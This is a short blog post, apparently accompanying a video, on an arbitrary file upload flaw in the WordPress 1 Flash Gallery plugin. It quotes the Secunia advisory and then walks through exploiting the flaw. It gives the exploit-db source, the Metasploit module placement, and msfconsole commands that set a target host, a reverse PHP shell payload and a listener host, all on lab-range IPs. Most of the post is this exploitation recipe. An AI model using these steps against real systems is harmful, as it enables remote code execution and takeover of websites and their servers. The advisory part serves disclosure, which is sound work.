Friday 1 June 2012

WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability




WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability
Secunia Advisory SA45930
Release Date 2011-09-08
The vulnerability is caused due to the wp-content/plugins/1-flash-gallery/upload.php script (when "action" is set to "uploadify" and "fileext" is set to e.g. "php") improperly verifying uploaded files. This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6. Prior versions may also be affected.

Download the exploit from http://www.exploit-db.com/exploits/17801/
Copy to /pentest/exploits/framework3/modules/exploits/multi/http

Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained on my video.

msfconsole
use multi/http/flash_galery_wordpress
set RHOST 172.16.1.70
set URI /wordpress
set PAYLOAD php/reverse_php_airwolf
set LHOST 172.16.1.79
exploit

And that's it, thank you guys for watching it.